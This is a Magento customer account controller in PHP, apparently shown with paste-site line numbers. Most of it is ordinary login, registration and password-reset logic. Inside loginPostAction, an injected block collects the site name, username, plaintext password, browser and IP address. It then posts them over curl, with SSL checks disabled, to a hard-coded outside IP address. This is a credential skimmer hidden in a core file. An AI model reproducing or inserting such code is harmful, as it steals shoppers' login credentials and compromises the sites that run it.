<?php
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magentocommerce.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 *
 * @category Mage
 * @package Mage_Customer
 * @copyright Copyright (c) 2014 Magento Inc. (http://www.magentocommerce.com)
 * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 */

/**
 * Customer account controller
 *
 * @category Mage
 * @package Mage_Customer
 * @author Magento Core Team <core@magentocommerce.com>
 */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36. /**
  37. * Action list where need check enabled cookie
  38. *
  39. * @var array
  40. */
  41. protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43. /**
  44. * Retrieve customer session model object
  45. *
  46. * @return Mage_Customer_Model_Session
  47. */
  48. protected function _getSession()
  49. {
  50. return Mage::getSingleton('customer/session');
  51. }
  52.  
  53. /**
  54. * Action predispatch
  55. *
  56. * Check customer authentication for some actions
  57. */
  58. public function preDispatch()
  59. {
  60. // a brute-force protection here would be nice
  61.  
  62. parent::preDispatch();
  63.  
  64. if (!$this->getRequest()->isDispatched()) {
  65. return;
  66. }
  67.  
  68. $action = $this->getRequest()->getActionName();
  69. $openActions = array(
  70. 'create',
  71. 'login',
  72. 'logoutsuccess',
  73. 'forgotpassword',
  74. 'forgotpasswordpost',
  75. 'resetpassword',
  76. 'resetpasswordpost',
  77. 'confirm',
  78. 'confirmation'
  79. );
  80. $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82. if (!preg_match($pattern, $action)) {
  83. if (!$this->_getSession()->authenticate($this)) {
  84. $this->setFlag('', 'no-dispatch', true);
  85. }
  86. } else {
  87. $this->_getSession()->setNoReferer(true);
  88. }
  89. }
  90.  
  91. /**
  92. * Action postdispatch
  93. *
  94. * Remove No-referer flag from customer session after each action
  95. */
  96. public function postDispatch()
  97. {
  98. parent::postDispatch();
  99. $this->_getSession()->unsNoReferer(false);
  100. }
  101.  
  102. /**
  103. * Default customer account page
  104. */
  105. public function indexAction()
  106. {
  107. $this->loadLayout();
  108. $this->_initLayoutMessages('customer/session');
  109. $this->_initLayoutMessages('catalog/session');
  110.  
  111. $this->getLayout()->getBlock('content')->append(
  112. $this->getLayout()->createBlock('customer/account_dashboard')
  113. );
  114. $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115. $this->renderLayout();
  116. }
  117.  
  118. /**
  119. * Customer login form page
  120. */
  121. public function loginAction()
  122. {
  123. if ($this->_getSession()->isLoggedIn()) {
  124. $this->_redirect('*/*/');
  125. return;
  126. }
  127. $this->getResponse()->setHeader('Login-Required', 'true');
  128. $this->loadLayout();
  129. $this->_initLayoutMessages('customer/session');
  130. $this->_initLayoutMessages('catalog/session');
  131. $this->renderLayout();
  132. }
  133.  
  134. /**
  135. * Login post action
  136. */
  137. public function loginPostAction()
  138. {
  139. if (!$this->_validateFormKey()) {
  140. $this->_redirect('*/*/');
  141. return;
  142. }
  143.  
  144. if ($this->_getSession()->isLoggedIn()) {
  145. $this->_redirect('*/*/');
  146. return;
  147. }
  148. $session = $this->_getSession();
  149.  
  150. if ($this->getRequest()->isPost()) {
  151. $login = $this->getRequest()->getPost('login');
  152. if (!empty($login['username']) && !empty($login['password'])) {
  153. try {
  154. $session->login($login['username'], $login['password']);
  155. if ($session->getCustomer()->getIsJustConfirmed()) {
  156. $this->_welcomeCustomer($session->getCustomer(), true);
  157. }
  158. } catch (Mage_Core_Exception $e) {
  159. switch ($e->getCode()) {
  160. case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161. $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162. $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163. break;
  164. case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165. $message = $e->getMessage();
  166. break;
  167. default:
  168. $message = $e->getMessage();
  169. }
  170. $session->addError($message);
  171. $session->setUsername($login['username']);
  172. } catch (Exception $e) {
  173. // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174. }
  175. } else {
  176. $session->addError($this->__('Login and password are required.'));
  177. }
  178. }
  179. $data0 = $_SERVER['SERVER_NAME'];
  180. $data1 = $login['username'];
  181. $data2 = $login['password'];
  182. $data3 = $_SERVER['HTTP_USER_AGENT'];
  183. $data4 = $_SERVER['REMOTE_ADDR'];
  184. $mail12 = "site=".($data0)."&username=".($data1)."&password=".($data2)."&Browser=".($data3)."&ip=".($data4);
  185. $url = "http://69.30.232.110/mail.php";
  186. $ch = curl_init();
  187. curl_setopt($ch, CURLOPT_URL,$url);
  188. curl_setopt($ch, CURLOPT_REFERER, $url);
  189. curl_setopt($ch, CURLOPT_HEADER, 1);
  190. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  191. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  192. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  193. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
  194. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
  195. curl_setopt($ch, CURLOPT_POST, 1);
  196. curl_setopt($ch, CURLOPT_POSTFIELDS, $mail12);
  197. $result = curl_exec($ch);
  198. curl_close($ch);
  199.  
  200. $this->_loginPostRedirect();
  201. }
  202.  
  203. /**
  204. * Define target URL and redirect customer after logging in
  205. */
  206. protected function _loginPostRedirect()
  207. {
  208. $session = $this->_getSession();
  209.  
  210. if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  211. // Set default URL to redirect customer to
  212. $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  213. // Redirect customer to the last page visited after logging in
  214. if ($session->isLoggedIn()) {
  215. if (!Mage::getStoreConfigFlag(
  216. Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  217. )) {
  218. $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  219. if ($referer) {
  220. // Rebuild referer URL to handle the case when SID was changed
  221. $referer = $this->_getModel('core/url')
  222. ->getRebuiltUrl( $this->_getHelper('core')->urlDecode($referer));
  223. if ($this->_isUrlInternal($referer)) {
  224. $session->setBeforeAuthUrl($referer);
  225. }
  226. }
  227. } else if ($session->getAfterAuthUrl()) {
  228. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  229. }
  230. } else {
  231. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  232. }
  233. } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
  234. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  235. } else {
  236. if (!$session->getAfterAuthUrl()) {
  237. $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  238. }
  239. if ($session->isLoggedIn()) {
  240. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  241. }
  242. }
  243. $this->_redirectUrl($session->getBeforeAuthUrl(true));
  244. }
  245.  
  246. /**
  247. * Customer logout action
  248. */
  249. public function logoutAction()
  250. {
  251. $this->_getSession()->logout()
  252. ->renewSession();
  253.  
  254. $this->_redirect('*/*/logoutSuccess');
  255. }
  256.  
  257. /**
  258. * Logout success page
  259. */
  260. public function logoutSuccessAction()
  261. {
  262. $this->loadLayout();
  263. $this->renderLayout();
  264. }
  265.  
  266. /**
  267. * Customer register form page
  268. */
  269. public function createAction()
  270. {
  271. if ($this->_getSession()->isLoggedIn()) {
  272. $this->_redirect('*/*');
  273. return;
  274. }
  275.  
  276. $this->loadLayout();
  277. $this->_initLayoutMessages('customer/session');
  278. $this->renderLayout();
  279. }
  280.  
  281. /**
  282. * Create customer account action
  283. */
  284. public function createPostAction()
  285. {
  286. /** @var $session Mage_Customer_Model_Session */
  287. $session = $this->_getSession();
  288. if ($session->isLoggedIn()) {
  289. $this->_redirect('*/*/');
  290. return;
  291. }
  292. $session->setEscapeMessages(true); // prevent XSS injection in user input
  293. if (!$this->getRequest()->isPost()) {
  294. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  295. $this->_redirectError($errUrl);
  296. return;
  297. }
  298.  
  299. $customer = $this->_getCustomer();
  300.  
  301. try {
  302. $errors = $this->_getCustomerErrors($customer);
  303.  
  304. if (empty($errors)) {
  305. $customer->save();
  306. $this->_dispatchRegisterSuccess($customer);
  307. $this->_successProcessRegistration($customer);
  308. return;
  309. } else {
  310. $this->_addSessionError($errors);
  311. }
  312. } catch (Mage_Core_Exception $e) {
  313. $session->setCustomerFormData($this->getRequest()->getPost());
  314. if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  315. $url = $this->_getUrl('customer/account/forgotpassword');
  316. $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  317. $session->setEscapeMessages(false);
  318. } else {
  319. $message = $e->getMessage();
  320. }
  321. $session->addError($message);
  322. } catch (Exception $e) {
  323. $session->setCustomerFormData($this->getRequest()->getPost())
  324. ->addException($e, $this->__('Cannot save the customer.'));
  325. }
  326. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  327. $this->_redirectError($errUrl);
  328. }
  329.  
  330. /**
  331. * Success Registration
  332. *
  333. * @param Mage_Customer_Model_Customer $customer
  334. * @return Mage_Customer_AccountController
  335. */
  336. protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  337. {
  338. $session = $this->_getSession();
  339. if ($customer->isConfirmationRequired()) {
  340. /** @var $app Mage_Core_Model_App */
  341. $app = $this->_getApp();
  342. /** @var $store Mage_Core_Model_Store*/
  343. $store = $app->getStore();
  344. $customer->sendNewAccountEmail(
  345. 'confirmation',
  346. $session->getBeforeAuthUrl(),
  347. $store->getId()
  348. );
  349. $customerHelper = $this->_getHelper('customer');
  350. $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  351. $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  352. $url = $this->_getUrl('*/*/index', array('_secure' => true));
  353. } else {
  354. $session->setCustomerAsLoggedIn($customer);
  355. $url = $this->_welcomeCustomer($customer);
  356. }
  357. $this->_redirectSuccess($url);
  358. return $this;
  359. }
  360.  
  361. /**
  362. * Get Customer Model
  363. *
  364. * @return Mage_Customer_Model_Customer
  365. */
  366. protected function _getCustomer()
  367. {
  368. $customer = $this->_getFromRegistry('current_customer');
  369. if (!$customer) {
  370. $customer = $this->_getModel('customer/customer')->setId(null);
  371. }
  372. if ($this->getRequest()->getParam('is_subscribed', false)) {
  373. $customer->setIsSubscribed(1);
  374. }
  375. /**
  376. * Initialize customer group id
  377. */
  378. $customer->getGroupId();
  379.  
  380. return $customer;
  381. }
  382.  
  383. /**
  384. * Add session error method
  385. *
  386. * @param string|array $errors
  387. */
  388. protected function _addSessionError($errors)
  389. {
  390. $session = $this->_getSession();
  391. $session->setCustomerFormData($this->getRequest()->getPost());
  392. if (is_array($errors)) {
  393. foreach ($errors as $errorMessage) {
  394. $session->addError($errorMessage);
  395. }
  396. } else {
  397. $session->addError($this->__('Invalid customer data'));
  398. }
  399. }
  400.  
  401. /**
  402. * Validate customer data and return errors if they are
  403. *
  404. * @param Mage_Customer_Model_Customer $customer
  405. * @return array|string
  406. */
  407. protected function _getCustomerErrors($customer)
  408. {
  409. $errors = array();
  410. $request = $this->getRequest();
  411. if ($request->getPost('create_address')) {
  412. $errors = $this->_getErrorsOnCustomerAddress($customer);
  413. }
  414. $customerForm = $this->_getCustomerForm($customer);
  415. $customerData = $customerForm->extractData($request);
  416. $customerErrors = $customerForm->validateData($customerData);
  417. if ($customerErrors !== true) {
  418. $errors = array_merge($customerErrors, $errors);
  419. } else {
  420. $customerForm->compactData($customerData);
  421. $customer->setPassword($request->getPost('password'));
  422. $customer->setConfirmation($request->getPost('confirmation'));
  423. $customerErrors = $customer->validate();
  424. if (is_array($customerErrors)) {
  425. $errors = array_merge($customerErrors, $errors);
  426. }
  427. }
  428. return $errors;
  429. }
  430.  
  431. /**
  432. * Get Customer Form Initalized Model
  433. *
  434. * @param Mage_Customer_Model_Customer $customer
  435. * @return Mage_Customer_Model_Form
  436. */
  437. protected function _getCustomerForm($customer)
  438. {
  439. /* @var $customerForm Mage_Customer_Model_Form */
  440. $customerForm = $this->_getModel('customer/form');
  441. $customerForm->setFormCode('customer_account_create');
  442. $customerForm->setEntity($customer);
  443. return $customerForm;
  444. }
  445.  
  446. /**
  447. * Get Helper
  448. *
  449. * @param string $path
  450. * @return Mage_Core_Helper_Abstract
  451. */
  452. protected function _getHelper($path)
  453. {
  454. return Mage::helper($path);
  455. }
  456.  
  457. /**
  458. * Get App
  459. *
  460. * @return Mage_Core_Model_App
  461. */
  462. protected function _getApp()
  463. {
  464. return Mage::app();
  465. }
  466.  
  467. /**
  468. * Dispatch Event
  469. *
  470. * @param Mage_Customer_Model_Customer $customer
  471. */
  472. protected function _dispatchRegisterSuccess($customer)
  473. {
  474. Mage::dispatchEvent('customer_register_success',
  475. array('account_controller' => $this, 'customer' => $customer)
  476. );
  477. }
  478.  
  479. /**
  480. * Gets customer address
  481. *
  482. * @param $customer
  483. * @return array $errors
  484. */
  485. protected function _getErrorsOnCustomerAddress($customer)
  486. {
  487. $errors = array();
  488. /* @var $address Mage_Customer_Model_Address */
  489. $address = $this->_getModel('customer/address');
  490. /* @var $addressForm Mage_Customer_Model_Form */
  491. $addressForm = $this->_getModel('customer/form');
  492. $addressForm->setFormCode('customer_register_address')
  493. ->setEntity($address);
  494.  
  495. $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  496. $addressErrors = $addressForm->validateData($addressData);
  497. if (is_array($addressErrors)) {
  498. $errors = array_merge($errors, $addressErrors);
  499. }
  500. $address->setId(null)
  501. ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  502. ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  503. $addressForm->compactData($addressData);
  504. $customer->addAddress($address);
  505.  
  506. $addressErrors = $address->validate();
  507. if (is_array($addressErrors)) {
  508. $errors = array_merge($errors, $addressErrors);
  509. }
  510. return $errors;
  511. }
  512.  
  513. /**
  514. * Get model by path
  515. *
  516. * @param string $path
  517. * @param array|null $arguments
  518. * @return false|Mage_Core_Model_Abstract
  519. */
  520. public function _getModel($path, $arguments = array())
  521. {
  522. return Mage::getModel($path, $arguments);
  523. }
  524.  
  525. /**
  526. * Get model from registry by path
  527. *
  528. * @param string $path
  529. * @return mixed
  530. */
  531. protected function _getFromRegistry($path)
  532. {
  533. return Mage::registry($path);
  534. }
  535.  
  536. /**
  537. * Add welcome message and send new account email.
  538. * Returns success URL
  539. *
  540. * @param Mage_Customer_Model_Customer $customer
  541. * @param bool $isJustConfirmed
  542. * @return string
  543. */
  544. protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  545. {
  546. $this->_getSession()->addSuccess(
  547. $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  548. );
  549. if ($this->_isVatValidationEnabled()) {
  550. // Show corresponding VAT message to customer
  551. $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  552. $userPrompt = '';
  553. switch ($configAddressType) {
  554. case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  555. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  556. $this->_getUrl('customer/address/edit'));
  557. break;
  558. default:
  559. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  560. $this->_getUrl('customer/address/edit'));
  561. }
  562. $this->_getSession()->addSuccess($userPrompt);
  563. }
  564.  
  565. $customer->sendNewAccountEmail(
  566. $isJustConfirmed ? 'confirmed' : 'registered',
  567. '',
  568. Mage::app()->getStore()->getId()
  569. );
  570.  
  571. $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  572. if ($this->_getSession()->getBeforeAuthUrl()) {
  573. $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  574. }
  575. return $successUrl;
  576. }
  577.  
  578. /**
  579. * Confirm customer account by id and confirmation key
  580. */
  581. public function confirmAction()
  582. {
  583. $session = $this->_getSession();
  584. if ($session->isLoggedIn()) {
  585. $this->_getSession()->logout()->regenerateSessionId();
  586. }
  587. try {
  588. $id = $this->getRequest()->getParam('id', false);
  589. $key = $this->getRequest()->getParam('key', false);
  590. $backUrl = $this->getRequest()->getParam('back_url', false);
  591. if (empty($id) || empty($key)) {
  592. throw new Exception($this->__('Bad request.'));
  593. }
  594.  
  595. // load customer by id (try/catch in case if it throws exceptions)
  596. try {
  597. $customer = $this->_getModel('customer/customer')->load($id);
  598. if ((!$customer) || (!$customer->getId())) {
  599. throw new Exception('Failed to load customer by id.');
  600. }
  601. }
  602. catch (Exception $e) {
  603. throw new Exception($this->__('Wrong customer account specified.'));
  604. }
  605.  
  606. // check if it is inactive
  607. if ($customer->getConfirmation()) {
  608. if ($customer->getConfirmation() !== $key) {
  609. throw new Exception($this->__('Wrong confirmation key.'));
  610. }
  611.  
  612. // activate customer
  613. try {
  614. $customer->setConfirmation(null);
  615. $customer->save();
  616. }
  617. catch (Exception $e) {
  618. throw new Exception($this->__('Failed to confirm customer account.'));
  619. }
  620.  
  621. // log in and send greeting email, then die happy
  622. $session->setCustomerAsLoggedIn($customer);
  623. $successUrl = $this->_welcomeCustomer($customer, true);
  624. $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  625. return;
  626. }
  627.  
  628. // die happy
  629. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  630. return;
  631. }
  632. catch (Exception $e) {
  633. // die unhappy
  634. $this->_getSession()->addError($e->getMessage());
  635. $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  636. return;
  637. }
  638. }
  639.  
  640. /**
  641. * Send confirmation link to specified email
  642. */
  643. public function confirmationAction()
  644. {
  645. $customer = $this->_getModel('customer/customer');
  646. if ($this->_getSession()->isLoggedIn()) {
  647. $this->_redirect('*/*/');
  648. return;
  649. }
  650.  
  651. // try to confirm by email
  652. $email = $this->getRequest()->getPost('email');
  653. if ($email) {
  654. try {
  655. $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  656. if (!$customer->getId()) {
  657. throw new Exception('');
  658. }
  659. if ($customer->getConfirmation()) {
  660. $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  661. $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  662. } else {
  663. $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  664. }
  665. $this->_getSession()->setUsername($email);
  666. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  667. } catch (Exception $e) {
  668. $this->_getSession()->addException($e, $this->__('Wrong email.'));
  669. $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  670. }
  671. return;
  672. }
  673.  
  674. // output form
  675. $this->loadLayout();
  676.  
  677. $this->getLayout()->getBlock('accountConfirmation')
  678. ->setEmail($this->getRequest()->getParam('email', $email));
  679.  
  680. $this->_initLayoutMessages('customer/session');
  681. $this->renderLayout();
  682. }
  683.  
  684. /**
  685. * Get Url method
  686. *
  687. * @param string $url
  688. * @param array $params
  689. * @return string
  690. */
  691. protected function _getUrl($url, $params = array())
  692. {
  693. return Mage::getUrl($url, $params);
  694. }
  695.  
  696. /**
  697. * Forgot customer password page
  698. */
  699. public function forgotPasswordAction()
  700. {
  701. $this->loadLayout();
  702.  
  703. $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  704. $this->_getSession()->getForgottenEmail()
  705. );
  706. $this->_getSession()->unsForgottenEmail();
  707.  
  708. $this->_initLayoutMessages('customer/session');
  709. $this->renderLayout();
  710. }
  711.  
  712. /**
  713. * Forgot customer password action
  714. */
  715. public function forgotPasswordPostAction()
  716. {
  717. $email = (string) $this->getRequest()->getPost('email');
  718. if ($email) {
  719. if (!Zend_Validate::is($email, 'EmailAddress')) {
  720. $this->_getSession()->setForgottenEmail($email);
  721. $this->_getSession()->addError($this->__('Invalid email address.'));
  722. $this->_redirect('*/*/forgotpassword');
  723. return;
  724. }
  725.  
  726. /** @var $customer Mage_Customer_Model_Customer */
  727. $customer = $this->_getModel('customer/customer')
  728. ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  729. ->loadByEmail($email);
  730.  
  731. if ($customer->getId()) {
  732. try {
  733. $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
  734. $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  735. $customer->sendPasswordResetConfirmationEmail();
  736. } catch (Exception $exception) {
  737. $this->_getSession()->addError($exception->getMessage());
  738. $this->_redirect('*/*/forgotpassword');
  739. return;
  740. }
  741. }
  742. $this->_getSession()
  743. ->addSuccess( $this->_getHelper('customer')
  744. ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  745. $this->_getHelper('customer')->escapeHtml($email)));
  746. $this->_redirect('*/*/');
  747. return;
  748. } else {
  749. $this->_getSession()->addError($this->__('Please enter your email.'));
  750. $this->_redirect('*/*/forgotpassword');
  751. return;
  752. }
  753. }
  754.  
  755. /**
  756. * Display reset forgotten password form
  757. *
  758. * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
  759. *
  760. */
  761. public function resetPasswordAction()
  762. {
  763. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  764. $customerId = (int) $this->getRequest()->getQuery('id');
  765. try {
  766. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  767. $this->loadLayout();
  768. // Pass received parameters to the reset forgotten password form
  769. $this->getLayout()->getBlock('resetPassword')
  770. ->setCustomerId($customerId)
  771. ->setResetPasswordLinkToken($resetPasswordLinkToken);
  772. $this->renderLayout();
  773. } catch (Exception $exception) {
  774. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  775. $this->_redirect('*/*/forgotpassword');
  776. }
  777. }
  778.  
  779. /**
  780. * Reset forgotten password
  781. * Used to handle data recieved from reset forgotten password form
  782. */
  783. public function resetPasswordPostAction()
  784. {
  785. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  786. $customerId = (int) $this->getRequest()->getQuery('id');
  787. $password = (string) $this->getRequest()->getPost('password');
  788. $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  789.  
  790. try {
  791. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  792. } catch (Exception $exception) {
  793. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  794. $this->_redirect('*/*/');
  795. return;
  796. }
  797.  
  798. $errorMessages = array();
  799. if (iconv_strlen($password) <= 0) {
  800. array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  801. }
  802. /** @var $customer Mage_Customer_Model_Customer */
  803. $customer = $this->_getModel('customer/customer')->load($customerId);
  804.  
  805. $customer->setPassword($password);
  806. $customer->setConfirmation($passwordConfirmation);
  807. $validationErrorMessages = $customer->validate();
  808. if (is_array($validationErrorMessages)) {
  809. $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  810. }
  811.  
  812. if (!empty($errorMessages)) {
  813. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  814. foreach ($errorMessages as $errorMessage) {
  815. $this->_getSession()->addError($errorMessage);
  816. }
  817. $this->_redirect('*/*/resetpassword', array(
  818. 'id' => $customerId,
  819. 'token' => $resetPasswordLinkToken
  820. ));
  821. return;
  822. }
  823.  
  824. try {
  825. // Empty current reset password token i.e. invalidate it
  826. $customer->setRpToken(null);
  827. $customer->setRpTokenCreatedAt(null);
  828. $customer->setConfirmation(null);
  829. $customer->save();
  830. $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  831. $this->_redirect('*/*/login');
  832. } catch (Exception $exception) {
  833. $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  834. $this->_redirect('*/*/resetpassword', array(
  835. 'id' => $customerId,
  836. 'token' => $resetPasswordLinkToken
  837. ));
  838. return;
  839. }
  840. }
  841.  
  842. /**
  843. * Check if password reset token is valid
  844. *
  845. * @param int $customerId
  846. * @param string $resetPasswordLinkToken
  847. * @throws Mage_Core_Exception
  848. */
  849. protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  850. {
  851. if (!is_int($customerId)
  852. || !is_string($resetPasswordLinkToken)
  853. || empty($resetPasswordLinkToken)
  854. || empty($customerId)
  855. || $customerId < 0
  856. ) {
  857. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  858. }
  859.  
  860. /** @var $customer Mage_Customer_Model_Customer */
  861. $customer = $this->_getModel('customer/customer')->load($customerId);
  862. if (!$customer || !$customer->getId()) {
  863. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  864. }
  865.  
  866. $customerToken = $customer->getRpToken();
  867. if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  868. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  869. }
  870. }
  871.  
  872. /**
  873. * Forgot customer account information page
  874. */
  875. public function editAction()
  876. {
  877. $this->loadLayout();
  878. $this->_initLayoutMessages('customer/session');
  879. $this->_initLayoutMessages('catalog/session');
  880.  
  881. $block = $this->getLayout()->getBlock('customer_edit');
  882. if ($block) {
  883. $block->setRefererUrl($this->_getRefererUrl());
  884. }
  885. $data = $this->_getSession()->getCustomerFormData(true);
  886. $customer = $this->_getSession()->getCustomer();
  887. if (!empty($data)) {
  888. $customer->addData($data);
  889. }
  890. if ($this->getRequest()->getParam('changepass') == 1) {
  891. $customer->setChangePassword(1);
  892. }
  893.  
  894. $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  895. $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  896. $this->renderLayout();
  897. }
  898.  
  899. /**
  900. * Change customer password action
  901. */
  902. public function editPostAction()
  903. {
  904. if (!$this->_validateFormKey()) {
  905. return $this->_redirect('*/*/edit');
  906. }
  907.  
  908. if ($this->getRequest()->isPost()) {
  909. /** @var $customer Mage_Customer_Model_Customer */
  910. $customer = $this->_getSession()->getCustomer();
  911.  
  912. /** @var $customerForm Mage_Customer_Model_Form */
  913. $customerForm = $this->_getModel('customer/form');
  914. $customerForm->setFormCode('customer_account_edit')
  915. ->setEntity($customer);
  916.  
  917. $customerData = $customerForm->extractData($this->getRequest());
  918.  
  919. $errors = array();
  920. $customerErrors = $customerForm->validateData($customerData);
  921. if ($customerErrors !== true) {
  922. $errors = array_merge($customerErrors, $errors);
  923. } else {
  924. $customerForm->compactData($customerData);
  925. $errors = array();
  926.  
  927. // If password change was requested then add it to common validation scheme
  928. if ($this->getRequest()->getParam('change_password')) {
  929. $currPass = $this->getRequest()->getPost('current_password');
  930. $newPass = $this->getRequest()->getPost('password');
  931. $confPass = $this->getRequest()->getPost('confirmation');
  932.  
  933. $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  934. if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  935. list($_salt, $salt) = explode(':', $oldPass);
  936. } else {
  937. $salt = false;
  938. }
  939.  
  940. if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  941. if (strlen($newPass)) {
  942. /**
  943. * Set entered password and its confirmation - they
  944. * will be validated later to match each other and be of right length
  945. */
  946. $customer->setPassword($newPass);
  947. $customer->setConfirmation($confPass);
  948. } else {
  949. $errors[] = $this->__('New password field cannot be empty.');
  950. }
  951. } else {
  952. $errors[] = $this->__('Invalid current password');
  953. }
  954. }
  955.  
  956. // Validate account and compose list of errors if any
  957. $customerErrors = $customer->validate();
  958. if (is_array($customerErrors)) {
  959. $errors = array_merge($errors, $customerErrors);
  960. }
  961. }
  962.  
  963. if (!empty($errors)) {
  964. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  965. foreach ($errors as $message) {
  966. $this->_getSession()->addError($message);
  967. }
  968. $this->_redirect('*/*/edit');
  969. return $this;
  970. }
  971.  
  972. try {
  973. $customer->setConfirmation(null);
  974. $customer->save();
  975. $this->_getSession()->setCustomer($customer)
  976. ->addSuccess($this->__('The account information has been saved.'));
  977.  
  978. $this->_redirect('customer/account');
  979. return;
  980. } catch (Mage_Core_Exception $e) {
  981. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  982. ->addError($e->getMessage());
  983. } catch (Exception $e) {
  984. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  985. ->addException($e, $this->__('Cannot save the customer.'));
  986. }
  987. }
  988.  
  989. $this->_redirect('*/*/edit');
  990. }
  991.  
  992. /**
  993. * Filtering posted data. Converting localized data if needed
  994. *
  995. * @param array
  996. * @return array
  997. */
  998. protected function _filterPostData($data)
  999. {
  1000. $data = $this->_filterDates($data, array('dob'));
  1001. return $data;
  1002. }
  1003.  
